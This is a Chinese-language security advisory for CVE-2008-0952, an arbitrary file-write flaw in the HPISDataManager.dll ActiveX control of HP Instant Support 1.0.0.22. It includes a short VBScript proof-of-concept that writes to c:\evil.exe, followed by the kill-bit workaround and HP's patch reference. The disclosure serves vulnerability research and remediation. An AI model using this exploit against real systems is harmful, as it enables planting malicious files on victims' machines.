发布日期：2008-06-03
更新日期：2008-06-05

受影响系统：

HP Instant Support 1.0.0.22

不受影响系统：

HP Instant Support 1.0.0.24

描述：

---

BUGTRAQ  ID: 29535
CVE(CAN) ID: CVE-2008-0952

HP Instant Support是是基于网络的故障诊断和排除工具套件，适用于桌面计算和打印产品。

HP Instant Support所安装的HPISDataManager.dll ActiveX控件没有正确地过滤对AppendStringToFile函数的输入参数。如果用户受骗访问了恶意网页并向该函数传送了恶意参数的话，就可能导致向系统上的任意位置写入任意文件。

<*来源：Dennis Rand （DER@cowi.dk）
  
  链接：http://secunia.com/advisories/30516/
        http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf
        http://marc.info/?l=bugtraq&m=121259280006874&w=2
        http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub AppendStringToFile ( ByVal bstrInputFileName As String , ByVal bstrInputString As
String )"
memberName = "AppendStringToFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 2
arg1="c:\evil.exe"
arg2=String("CSIS entered this")
target.AppendStringToFile arg1 ,arg2
</script></job></package>

建议：

---

临时解决方法：

* 为clsid：14C1B87C-3342-445F-9B5E-365FF330A3AC设置kill-bit。

厂商补丁：

HP
--
HP已经为此发布了一个安全公告（HPSBMA02326）以及相应补丁:
HPSBMA02326：SSRT071490 rev.1 - HP Instant Support HPISDataManager.dll Running on Windows, Remote Execution of Arbitrary Code
链接：http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264

浏览次数：2454
严重程度：0（网友投票）